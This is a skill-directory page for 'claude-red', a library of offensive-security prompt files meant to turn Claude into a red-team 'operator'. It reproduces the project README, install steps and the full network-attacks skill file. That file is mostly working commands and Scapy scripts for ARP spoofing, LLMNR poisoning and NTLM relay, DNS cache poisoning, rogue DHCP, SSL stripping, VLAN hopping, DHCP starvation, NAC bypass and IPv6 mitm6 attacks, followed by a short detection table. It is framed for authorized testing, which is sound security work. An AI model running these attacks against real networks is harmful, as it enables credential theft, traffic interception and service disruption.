SkillAtlasSkill 详情

offensive-network-attacks

Offensive security skills for Claude — drop-in SKILL.

审核状态:已审核Quality 72Security 52

复制安装命令

用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。

复制前请先查看来源、License 和安全提示。

项目 README

来源文件:README.md

抓取于 2026年8月27日

claude-red banner

claude-red

Offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator.

License: MIT Skills Categories Stars Forks

Built by SnailSploit — GenAI Security Research.


Table of Contents


What is this

claude-red is a curated library of offensive security skills for the Claude Skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse.

Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using.

Use it for: authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically.


Quickstart

Claude Skills System (recommended)

# Clone into a directory Claude will scan
git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red

# Or install only one category
git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red
cd claude-red && git sparse-checkout set Skills/web Skills/active-directory

Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads offensive-sqli).

Claude Code

# Point Claude at a single skill before a session
cat Skills/web/offensive-sqli/SKILL.md | claude --system-file -

# Or load a whole category
cat Skills/active-directory/**/SKILL.md | claude --system-file -

Claude.ai (Manual)

Paste the contents of a SKILL.md into a Project's system prompt or prepend to your conversation.

Install Script

./install.sh                           # interactive
./install.sh --target ~/.claude/skills # explicit target
./install.sh --category web            # one category

Categories

CategorySkillsFocus
Web Application16OWASP Top 10 + business logic + advanced web bug classes
Auth & Identity2JWT, OAuth
Active Directory1On-prem AD attack methodology (expanding)
Wireless13802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz
Cloud1AWS / Azure / GCP attack paths (expanding)
Mobile1Android + iOS pentest (expanding)
IoT & Embedded1Hardware, firmware, RTOS, ICS (expanding)
Infrastructure & Red Team7Initial access, EDR evasion, advanced red team ops, Windows internals
Exploit Development6Stack/heap, mitigations, crash analysis, TOCTOU
Fuzzing & VR4libFuzzer, AFL++, bug ID, vuln classes
Reconnaissance2OSINT tooling and methodology
API Security2REST/gRPC/WebSocket testing, business logic abuse
Container & Kubernetes2Container escape, K8s cluster attacks
CI/CD & Pipeline2Pipeline exploitation, secrets extraction
Cryptography2Crypto implementation attacks, TLS/SSL
Privilege Escalation2Linux and Windows privesc
Post-Exploitation3Lateral movement, persistence, data exfiltration
Forensics & C22Anti-forensics, C2 framework tradecraft
Supply Chain2Supply chain attacks, dependency confusion
Social Engineering2Phishing campaigns, physical/vishing/smishing
Network Attacks1Layer 2/3 attacks, MITM, poisoning
AI Security1Prompt injection, jailbreaks, RAG poisoning
Utility2Fast-checking, professional reporting

Skill Index

Web Application

Skills/web/

SkillDescription
offensive-sqliSQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths
offensive-xssCross-site scripting — stored, reflected, DOM, mutation
offensive-ssrfServer-side request forgery — cloud metadata, filter bypass
offensive-sstiServer-side template injection — engine ID, RCE paths
offensive-xxeXML external entity — OOB exfil, blind exploitation
offensive-idorInsecure direct object references — enumeration, business logic
offensive-file-uploadFile upload — extension bypass, polyglots, webshells
offensive-rceRemote code execution — chaining, command injection
offensive-deserializationInsecure deserialization — Java/PHP/.NET gadget chains
offensive-race-conditionRace conditions — TOCTOU, single-packet, limit bypass
offensive-request-smugglingHTTP request smuggling — CL.TE, TE.CL, h2 desync
offensive-open-redirectOpen redirect — OAuth abuse, phishing, SSRF pivots
offensive-parameter-pollutionHTTP parameter pollution — WAF bypass, logic confusion
offensive-graphqlGraphQL — introspection, batching, IDOR via aliases
offensive-waf-bypassWAF bypass — encoding, chunking, case mutation
offensive-business-logicBusiness logic — workflow bypass, pricing, refunds, chains

Auth & Identity

Skills/auth/

SkillDescription
offensive-jwtJWT — alg:none, key confusion, secret cracking
offensive-oauthOAuth — open redirect abuse, token leakage, PKCE bypass

Active Directory

Skills/active-directory/

SkillDescription
offensive-active-directoryAD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD

Note: This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See Roadmap.

Wireless

Skills/wireless/

SkillDescription
offensive-wifi802.11 overview — entrypoint into the wireless category
offensive-wifi-reconAdapter selection, monitor mode, multi-band airspace mapping
offensive-wpa2-pskHandshake capture, PMKID, hashcat 22000 cracking
offensive-wpa3-saeTransition-mode downgrade, Dragonblood, SAE side-channels
offensive-wpa-enterprise802.1X / EAP attacks, eaphammer evil-twin RADIUS
offensive-wpsPixie Dust, online PIN brute, vendor PIN generators
offensive-evil-twinKARMA, Mana, captive portal, post-association MITM
offensive-krack-fragattacksKRACK + FragAttacks supplicant testing
offensive-deauth-disassocTargeted/broadcast deauth, PMF awareness, action frames
offensive-bluetooth-bleBLE GATT enum, pairing downgrade, sniffing, MITM
offensive-bluetooth-classicBR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing
offensive-zigbee-thread-matter802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection
offensive-z-waveS0 key derivation flaw, S2 commissioning, hub pivots
offensive-lorawan-sub-ghzLoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS

Cloud

Skills/cloud/

SkillDescription
offensive-cloudAWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion

Note: Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See Roadmap.

Mobile

Skills/mobile/

SkillDescription
offensive-mobileAndroid + iOS — Frida, pinning, storage, biometric, deep links

IoT & Embedded

Skills/iot/

SkillDescription
offensive-iotHardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP

Note: Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See Roadmap.

Infrastructure & Red Team

Skills/infrastructure/

SkillDescription
offensive-initial-accessPhishing, drive-by, supply chain — TA0001
offensive-advanced-redteamFull kill chain, C2, OPSEC, lateral, persistence
offensive-edr-evasionUnhooking, indirect syscalls, PPID spoofing
offensive-shellcodeWriting, encoding, injection techniques
offensive-keylogger-archKeylogger architecture and input-capture techniques
offensive-windows-mitigationsWindows mitigations — ACG, Arbitrary Code Guard
offensive-windows-boundariesDefeating Windows boundaries — sandbox escape, privilege

Exploit Development

Skills/exploit-dev/

SkillDescription
offensive-exploit-developmentStack/heap, ROP chains, mitigations
offensive-exploit-dev-courseStructured curriculum format
offensive-basic-exploitationLinux exploitation, mitigations disabled — beginner-to-mid
offensive-crash-analysisCrash triage, exploitability assessment, root cause
offensive-mitigationsModern kernel mitigations — ASLR, CFG, CET, PAC
offensive-toctouTime-of-check/use across binary, kernel, web, container

Fuzzing & Vulnerability Research

Skills/fuzzing/

SkillDescription
offensive-fuzzinglibFuzzer, AFL++, coverage-guided, mutation strategies
offensive-fuzzing-courseCurriculum — finding vulns via fuzzing
offensive-bug-identificationCode review patterns, static analysis triggers
offensive-vuln-classesVulnerability classes — real-world examples, taxonomy

Reconnaissance

Skills/recon/

SkillDescription
offensive-osintOSINT tools — recon-ng, theHarvester, Maltego pipelines
offensive-osint-methodologyOSINT methodology — structured intelligence collection

API Security

Skills/api/

SkillDescription
offensive-api-securityAPI testing — OWASP API Top 10, REST/gRPC/WebSocket, BOLA, BFLA, mass assignment
offensive-api-abuseAPI business logic — chaining, batching, JWT manipulation, webhook hijacking

Container & Kubernetes

Skills/container/

SkillDescription
offensive-container-escapeContainer breakout — privileged escape, Docker socket, capabilities, cgroup, runc CVEs
offensive-k8s-attacksKubernetes — RBAC abuse, etcd access, kubelet API, pod escape, secrets, CRD exploitation

CI/CD & Pipeline

Skills/cicd/

SkillDescription
offensive-cicd-pipelineCI/CD exploitation — GitHub Actions injection, Jenkins RCE, GitLab CI, Azure DevOps
offensive-cicd-secretsCI/CD secrets — env var extraction, vault misconfigs, OIDC federation, runner token abuse

Cryptography

Skills/crypto/

SkillDescription
offensive-crypto-attacksCrypto attacks — padding oracle, ECB manipulation, hash extension, RSA, weak PRNG
offensive-tls-attacksTLS/SSL — POODLE, DROWN, Heartbleed, pinning bypass, HSTS bypass, 0-RTT replay

Privilege Escalation

Skills/privesc/

SkillDescription
offensive-linux-privescLinux privesc — SUID, capabilities, sudo, cron, kernel exploits, Docker group
offensive-windows-privescWindows privesc — Potato family, service misconfigs, DLL hijacking, UAC bypass, PrintNightmare

Post-Exploitation

Skills/post-exploitation/

SkillDescription
offensive-lateral-movementLateral movement — PTH, PTT, NTLM relay, WMI/WinRM/DCOM, tunneling (chisel, ligolo-ng)
offensive-persistencePersistence — registry, scheduled tasks, WMI subs, Golden/Silver tickets, PAM backdoors
offensive-data-exfiltrationData exfiltration — DNS/HTTPS/ICMP tunneling, cloud dead drops, steganography

Forensics & C2

Skills/forensics/

SkillDescription
offensive-anti-forensicsAnti-forensics — log clearing, timestomping, ADS hiding, memory cleanup, anti-VM
offensive-c2-frameworksC2 tradecraft — Cobalt Strike, Sliver, Mythic, Havoc, Metasploit, redirectors, domain fronting

Supply Chain

Skills/supply-chain/

SkillDescription
offensive-supply-chainSupply chain — dependency confusion, typosquatting, build system attacks, image trojaning
offensive-dependency-confusionDependency confusion — npm/PyPI/NuGet/Maven/Go namespace attacks, safe PoC methodology

Social Engineering

Skills/social-engineering/

SkillDescription
offensive-phishingPhishing — GoPhish, EvilGinx2, payload delivery, email auth bypass, MFA phishing
offensive-social-engineeringSocial engineering — pretexting, vishing, smishing, physical SE, USB drops, watering holes

Network Attacks

Skills/network/

SkillDescription
offensive-network-attacksNetwork L2/L3 — ARP spoofing, LLMNR/NBT-NS poisoning, VLAN hopping, IPv6 attacks, MITM

AI Security

Skills/ai/

SkillDescription
offensive-ai-securityAI pentest — prompt injection, jailbreaking, RAG poisoning

Utility

Skills/utility/

SkillDescription
offensive-fast-checkingFast triage checklist — quick-win identification
offensive-reportingPro pentest reporting — CVSS, evidence, exec summary, retest

Roadmap

The library is being expanded in seven phases. Track progress in CHANGELOG.md.

PhaseCategoryNew SkillsStatus
1Internal AD/Windows (rename active-directory/ → internal/)+16Planned
2Cloud Identity (Entra/AAD, ADFS, Okta, M365)+10Planned
3Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz)+12Done
4IoT split (UART/JTAG, flash, fault injection, RTOS, ICS)+10Planned
5Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack)+8Planned
6Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI)+10Planned
7Polish (README, LICENSE, manifest, install)—Done
8New categories (API, container, CI/CD, crypto, privesc, post-exploitation, forensics/C2, supply chain, social engineering, network)+20Done
9Deep rewrites (deserialization, GraphQL, advanced red team, SSTI)—Done

End state: ~130 skills across 23+ categories.


Contributing

Contributions welcome. See CONTRIBUTING.md for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews.

License

MIT — use freely, attribution appreciated.

Acknowledgements

  • Author: Kai Aizen (SnailSploit) — snailsploit.com
  • Original Checklists: Sahar Shlichov — the offensive checklist collection many of these skills are based on.
  • Community: PRs and feedback that keep the library current with the threat landscape.

"Give Claude the right skill and it stops being a chatbot. It becomes an operator."


📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

https://snailsploit.com/claude-red

Created by Kai Aizen — independent offensive security researcher.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Same attack. Different substrate.

测试与质量

高风险

  • 来源需自行核对维护者身份。
  • 包含脚本或命令调用,安装前请复核。
  • 可能需要外部 token、网络权限或第三方服务。
  • 存在潜在风险命令,请谨慎安装。
  • 扫描发现:3 条。

Codex — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/network/offensive-network-attacks" 文件夹复制到 Codex 的 skills 目录中。
  4. 重启 Codex 让新的 skill 生效。

Codex — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Codex 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Codex 让新的 skill 生效。

Claude Code — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/network/offensive-network-attacks" 文件夹复制到 Claude Code 的 skills 目录中。
  4. 重启 Claude Code 让新的 skill 生效。

Claude Code — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Claude Code 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Claude Code 让新的 skill 生效。

Cursor — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/network/offensive-network-attacks" 文件夹复制到 Cursor 的 skills 目录中。
  4. 重启 Cursor 让新的 skill 生效。

Cursor — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Cursor 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Cursor 让新的 skill 生效。

GitHub Copilot — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/network/offensive-network-attacks" 文件夹复制到 GitHub Copilot 的 skills 目录中。
  4. 重启 GitHub Copilot 让新的 skill 生效。

GitHub Copilot — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 GitHub Copilot 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 GitHub Copilot 让新的 skill 生效。

Windsurf — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/network/offensive-network-attacks" 文件夹复制到 Windsurf 的 skills 目录中。
  4. 重启 Windsurf 让新的 skill 生效。

Windsurf — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Windsurf 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Windsurf 让新的 skill 生效。
查看 SKILL.md 原文
name: offensive-network-attacks
description: "Dense description covering ARP spoofing, LLMNR/NBT-NS/mDNS poisoning, DNS poisoning, MITM attacks, VLAN hopping, DHCP attacks, 802.1X/NAC bypass, IPv6 attacks. Tools: Bettercap, Responder, mitm6, Ettercap, Wireshark. MITRE T1557, T1040. Use when conducting internal network assessments or testing Layer 2/3 attack surface."

Network Attacks (Layer 2/3) -- Offensive Methodology

You are attacking Layer 2/3 infrastructure during an authorized internal engagement. ARP, DHCP, broadcast name resolution, VLAN trunking, and IPv6 autoconfiguration are all unauthenticated -- you exploit that trust to intercept credentials, redirect traffic, and cross network boundaries.

Quick Workflow

  1. Map your position -- VLAN, subnet, gateway, DNS, DHCP lease, IPv6 status.
  2. Passively sniff with tcpdump/Wireshark to discover hosts and cleartext credentials.
  3. Run Responder in analyze mode to observe LLMNR/NBT-NS/mDNS queries.
  4. Enable Responder poisoning to capture NTLMv2 hashes.
  5. Relay captured hashes with ntlmrelayx against hosts without SMB signing.
  6. ARP spoof the gateway for targeted MITM and credential interception.
  7. Probe VLAN boundaries via DTP negotiation and 802.1Q double tagging.
  8. Exploit IPv6 autoconfiguration with mitm6 for DNS takeover and NTLM relay.

ARP Spoofing

ARP has no authentication. You send gratuitous ARP replies to associate your MAC with the gateway IP in the victim's cache, routing their traffic through you.

Bettercap ARP Module

sudo bettercap -iface eth0
net.probe on                              # discover live hosts
net.show
set arp.spoof.targets 10.0.0.50          # single target
set arp.spoof.fullduplex true            # poison both victim and gateway
arp.spoof on

arpspoof and Ettercap

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.0.0.50 10.0.0.1   # tell victim you are the gateway
arpspoof -i eth0 -t 10.0.0.1 10.0.0.50   # tell gateway you are the victim (second terminal)

# Ettercap alternative
sudo ettercap -T -M arp:remote /10.0.0.50// /10.0.0.1//
sudo ettercap -T -M arp:remote -F inject.ef /10.0.0.50// /10.0.0.1//  # with filter

Gratuitous ARP with Scapy

from scapy.all import Ether, ARP, sendp
import time

pkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(
    op=2, psrc="10.0.0.1", hwsrc="aa:bb:cc:dd:ee:ff", pdst="10.0.0.50"
)
while True:
    sendp(pkt, iface="eth0", verbose=False)
    time.sleep(2)

Bypassing Static ARP Entries

Static entries block standard poisoning. Workarounds: overflow the ARP table so the host falls back to dynamic resolution; redirect at Layer 3 via DHCP/DNS attacks; or use VLAN hopping to attack from a segment without static entries.


LLMNR / NBT-NS / mDNS Poisoning

When DNS fails, Windows falls back to LLMNR (UDP 5355), NBT-NS (UDP 137), and mDNS (UDP 5353). You answer these broadcast queries with your IP, forcing victims to authenticate to your rogue services.

Responder Setup and Hash Capture

sudo responder -I eth0 -A                    # analyze mode -- observe without poisoning
sudo responder -I eth0 -wrf                  # full poisoning: -w WPAD, -r NBT-NS, -f fingerprint
# Hashes land in /opt/Responder/logs/
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule   # NTLMv2
hashcat -m 5500 hashes.txt wordlist.txt                        # NTLMv1 (weaker)

WPAD is a high-value vector: browsers query for wpad.dat via DNS then LLMNR/NBT-NS. The -w flag makes Responder serve a malicious WPAD config that captures NTLM authentication from browser traffic transparently.

Inveigh (Windows-Native)

From a compromised Windows host, poison without dropping Linux tools:

Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y -HTTPS Y -Proxy Y
Inveigh.exe -FileOutput Y -NBNS Y -mDNS Y -HTTP Y -LLMNR Y   # C# binary avoids PS logging

NTLMv1/v2 Relay with ntlmrelayx

When cracking fails, relay captured authentication to targets without SMB signing. Disable SMB and HTTP in Responder.conf first -- ntlmrelayx handles those protocols.

nxc smb 10.0.0.0/24 --gen-relay-list no-signing.txt
impacket-ntlmrelayx -tf no-signing.txt -smb2support -c "whoami"           # command exec
impacket-ntlmrelayx -tf no-signing.txt -t ldap://10.0.0.10 \
  --escalate-user attacker --delegate-access                               # LDAP privesc
impacket-ntlmrelayx -t http://ca.corp.local/certsrv/certfnsh.asp \
  -smb2support --adcs --template DomainController                          # ADCS ESC8

Trigger authentication via Responder poisoning, PetitPotam, PrinterBug, or DFSCoerce.


DNS Poisoning

DNS attacks redirect traffic at the application layer. You do not need Layer 2 adjacency if you control the resolution path.

Rogue DNS Server via DHCP Option 6

After DHCP starvation or on a network without DHCP snooping, deploy dnsmasq with your IP as DNS (option 6):

# /etc/dnsmasq-rogue.conf:
#   interface=eth0
#   dhcp-range=10.0.0.100,10.0.0.200,255.255.255.0,12h
#   dhcp-option=3,10.0.0.99    # gateway
#   dhcp-option=6,10.0.0.99    # DNS
#   address=/intranet.corp.local/10.0.0.99
#   server=8.8.8.8
sudo dnsmasq -C /etc/dnsmasq-rogue.conf -d

DNS Cache Poisoning with Scapy

from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send
import random

# Flood spoofed responses -- must match in-flight query txid and src port
for txid in range(1, 65535):
    pkt = IP(dst="10.0.0.2", src="8.8.8.8") / \
          UDP(sport=53, dport=random.randint(1024, 65535)) / \
          DNS(id=txid, qr=1, aa=1, qd=DNSQR(qname="intranet.corp.local"),
              an=DNSRR(rrname="intranet.corp.local", rdata="10.0.0.99", ttl=86400))
    send(pkt, verbose=False)

Modern resolvers randomize source ports and transaction IDs. Practical Kaminsky-style poisoning requires matching both fields simultaneously.

DNS Rebinding

Bypass same-origin policy by toggling a DNS record between your server and an internal IP:

# singularity framework: first resolution serves JS payload, second returns internal target
./singularity -DNSRebindStrategy DNSRebindFromRequest \
  -ResponseIPAddr 10.0.0.99 -ResponseReboundIPAddr 192.168.1.1

Man-in-the-Middle (MITM)

Once positioned between victim and gateway (via ARP spoof, DHCP redirect, or tap), intercept and modify traffic.

Bettercap HTTP Proxy and SSL Strip

sudo bettercap -iface eth0
set arp.spoof.targets 10.0.0.50
set arp.spoof.fullduplex true
arp.spoof on
set http.proxy.sslstrip true
http.proxy on
set net.sniff.verbose true
set net.sniff.regexp .*pass.*|.*user.*|.*login.*
net.sniff on

HSTS Bypass with sslstrip+ and dns2proxy

sslstrip+ rewrites domain names (e.g., accounts.google.com to accountss.google.com) so the browser never applies HSTS. dns2proxy resolves rewritten domains to real IPs.

arpspoof -i eth0 -t 10.0.0.50 10.0.0.1                                      # terminal 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000  # terminal 2
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 10000
python dns2proxy.py -i eth0                                                   # terminal 3
python sslstrip.py -l 10000 -a -w sslstrip.log                               # terminal 4

Credential Interception from Proxied Traffic

tshark -r capture.pcap -Y "http.authbasic" -T fields -e http.authbasic
tshark -r capture.pcap -Y "ftp.request.command == USER || ftp.request.command == PASS" \
  -T fields -e ftp.request.command -e ftp.request.arg
python3 Pcredz -f capture.pcap           # automated extraction (NTLM, HTTP, FTP, SMTP, SNMP)
sudo python3 net-creds.py -i eth0        # real-time credential sniffer

VLAN Hopping

Switch Spoofing (DTP Negotiation)

If the switch port is in dynamic auto/desirable mode (common Cisco default), negotiate a trunk:

sudo yersinia dtp -attack 1 -interface eth0    # DTP trunk negotiation
sudo tcpdump -i eth0 -nn -e vlan              # verify trunk formed
sudo modprobe 8021q
sudo vconfig add eth0 100                      # sub-interface for VLAN 100
sudo ifconfig eth0.100 10.100.0.99 netmask 255.255.255.0 up

Double Tagging (802.1Q)

Works when you are on the native VLAN and the switch strips only the outer tag. Unidirectional -- you send into the target VLAN but responses route normally and will not reach you.

from scapy.all import Ether, Dot1Q, IP, ICMP, ARP, sendp

# Outer tag = native VLAN (1), inner tag = target VLAN (100)
pkt = Ether(dst="ff:ff:ff:ff:ff:ff") / \
      Dot1Q(vlan=1) / Dot1Q(vlan=100) / IP(dst="10.100.0.50") / ICMP()
sendp(pkt, iface="eth0")

# Double-tagged ARP poisoning into target VLAN
arp_poison = Ether(dst="ff:ff:ff:ff:ff:ff") / Dot1Q(vlan=1) / Dot1Q(vlan=100) / \
    ARP(op=2, psrc="10.100.0.1", hwsrc="aa:bb:cc:dd:ee:ff", pdst="10.100.0.50")
sendp(arp_poison, iface="eth0", count=10, inter=2)

Yersinia Layer 2 Attacks

sudo yersinia stp -attack 4 -interface eth0  # STP root bridge takeover
sudo yersinia cdp -attack 1 -interface eth0  # CDP flood (Cisco switches)

DHCP Attacks

DHCP Starvation

Exhaust the pool so legitimate clients cannot get addresses:

sudo dhcpstarv -i eth0                         # dedicated starvation tool
sudo yersinia dhcp -attack 1 -interface eth0   # Yersinia alternative
from scapy.all import Ether, IP, UDP, BOOTP, DHCP, RandMAC, sendp
import random

for i in range(500):
    mac = str(RandMAC())
    pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") / \
          UDP(sport=68, dport=67) / BOOTP(chaddr=bytes.fromhex(mac.replace(":", "")),
          xid=random.randint(1, 0xFFFFFFFF)) / DHCP(options=[("message-type", "discover"), "end"])
    sendp(pkt, iface="eth0", verbose=False)

Rogue DHCP Server for Gateway Redirect

After starvation, offer leases with your IP as gateway and DNS:

# /etc/dnsmasq-rogue.conf: interface=eth0, dhcp-range=10.0.0.100,10.0.0.200,255.255.255.0,12h
#   dhcp-option=3,10.0.0.99 (gateway)   dhcp-option=6,10.0.0.99 (DNS)   dhcp-authoritative
sudo dnsmasq -C /etc/dnsmasq-rogue.conf -d
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

802.1X / NAC Bypass

MAB Bypass (MAC Spoofing)

If NAC uses MAC Authentication Bypass for printers/VoIP phones, spoof an authorized MAC:

sudo tcpdump -i eth0 -e -c 100 | awk '{print $2}' | sort -u  # discover authorized MACs
sudo ip link set eth0 down
sudo ip link set eth0 address AA:BB:CC:DD:EE:FF
sudo ip link set eth0 up && sudo dhclient eth0

Hub / Bridge Insertion

Bridge between an authenticated device and the switch port. 802.1X authenticates the port, not individual MACs -- your traffic shares the authenticated session:

sudo ip link add name br0 type bridge
sudo ip link set eth0 master br0          # eth0 to switch
sudo ip link set eth1 master br0          # eth1 to authenticated device
sudo ip link set br0 up

Certificate Impersonation

If EAP-TLS is used and the RADIUS server does not validate the CA chain strictly:

openssl req -new -x509 -days 365 -keyout fake-ca.key -out fake-ca.crt -subj "/CN=Corp-CA/O=Corp"
openssl req -new -keyout client.key -out client.csr -subj "/CN=PRINTER01/O=Corp"
openssl x509 -req -in client.csr -CA fake-ca.crt -CAkey fake-ca.key -CAcreateserial -out client.crt
# wpa_supplicant config: key_mgmt=IEEE8021X, eap=TLS, identity="PRINTER01", certs as above
sudo wpa_supplicant -i eth0 -D wired -c /etc/wpa_supplicant/wired.conf

NAC Profiling Evasion

Match expected device fingerprint -- OUI, DHCP hostname, TCP stack:

sudo macchanger -m 00:1A:4B:XX:XX:XX eth0                     # HP printer OUI
sudo dhclient -H "HP-LaserJet-M402" eth0                       # expected hostname
sudo iptables -t mangle -A POSTROUTING -j TTL --ttl-set 128   # Windows TTL

IPv6 Attacks

Most internal networks run dual-stack but lack IPv6 monitoring. Windows prefers IPv6 DNS over IPv4 -- advertise an IPv6 DNS server and all queries route through you.

SLAAC Abuse with mitm6

mitm6 replies to DHCPv6 requests, sets your host as DNS, then victims' name lookups trigger NTLM authentication back to your relay listener:

sudo mitm6 -d corp.local -i eth0                                       # terminal 1: DNS takeover
impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local \
  --delegate-access -wh attacker-wpad.corp.local                        # terminal 2: relay

Router Advertisement Spoofing

from scapy.all import (Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptSrcLLAddr,
                        ICMPv6NDOptPrefixInfo, ICMPv6NDOptRDNSS, sendp)

ra = Ether(dst="33:33:00:00:00:01") / IPv6(dst="ff02::1") / \
     ICMPv6ND_RA(routerlifetime=1800) / ICMPv6NDOptSrcLLAddr(lladdr="aa:bb:cc:dd:ee:ff") / \
     ICMPv6NDOptPrefixInfo(prefix="fd00::", prefixlen=64, validlifetime=1800) / \
     ICMPv6NDOptRDNSS(dns=["fd00::99"], lifetime=1800)
sendp(ra, iface="eth0", loop=1, inter=5)

DHCPv6 Poisoning and THC-IPV6

sudo atk6-fake_dhcps6 eth0 fd00::99 fe80::1 corp.local   # fake DHCPv6 server
sudo atk6-alive6 eth0                                      # discover IPv6 hosts
sudo atk6-fake_router6 eth0 fd00::/64                      # SLAAC prefix injection
sudo atk6-parasite6 eth0                                   # ICMPv6 neighbor spoofing
sudo atk6-flood_router6 eth0                                # RA flood (DoS)

NTLM Relay via IPv6

sudo mitm6 -d corp.local -i eth0 --ignore-nofqdn
impacket-ntlmrelayx -6 -t http://ca.corp.local/certsrv/certfnsh.asp \
  -smb2support --adcs --template Machine                    # relay to ADCS for cert theft

Sniffing and Traffic Analysis

Passive sniffing generates zero noise. Start here before any active technique.

tcpdump

sudo tcpdump -i eth0 -w capture.pcap -nn                                         # full capture
sudo tcpdump -i eth0 -w auth.pcap -nn 'port 21 or port 23 or port 25 or port 445 or port 80'
sudo tcpdump -i eth0 -w broadcast.pcap -nn 'udp port 5355 or udp port 137 or udp port 5353'
sudo tcpdump -i eth0 -w dhcp.pcap -nn 'udp port 67 or udp port 68'

Wireshark Display Filters

http.authbasic                          HTTP Basic Auth
ftp.request.command == "PASS"           FTP password
smtp.req.parameter contains "AUTH"      SMTP auth
ntlmssp                                 NTLM SSP traffic
ntlmssp.auth.username                   NTLM username
smb2.cmd == 1                           SMB session setup
dns.qry.name contains "wpad"            WPAD queries
llmnr                                   LLMNR broadcast
arp.duplicate-address-detected          ARP anomalies
vlan                                    802.1Q frames
snmp.community                          SNMP strings
kerberos.msg.type == 10                 Kerberos AS-REQ

Credential Extraction

python3 Pcredz -f capture.pcap                                                    # from pcap
sudo python2 net-creds.py -i eth0                                                 # real-time
tshark -r capture.pcap -Y "http.request.method == POST" \
  -T fields -e http.host -e http.request.uri -e urlencoded-form.value             # HTTP POST

Detection / Defender View

AttackPrimary DetectionKey Indicators
ARP SpoofingDuplicate MAC for gateway IP, ARP stormsDAI logs, IDS ARP anomaly signatures
LLMNR/NBT-NS PoisoningUnexpected multicast responses, SMB auth to unknown hostsEvent 4697, network IDS, LLMNR traffic spikes
DNS PoisoningMismatched DNS responses, TTL anomaliesDNS query logs, RPZ alerts, DNSSEC validation failures
MITM / SSL StripHTTP on known HTTPS-only services, cert warningsHSTS preload failures, proxy logs, certificate transparency
VLAN HoppingDTP frames from access ports, double-tagged framesSwitch port security logs, unexpected 802.1Q frames
DHCP StarvationRapid DHCP discover flood from random MACsDHCP snooping violations, unusual OUI patterns
Rogue DHCPMultiple DHCP offers, conflicting gateway/DNSDHCP snooping trusted port violations
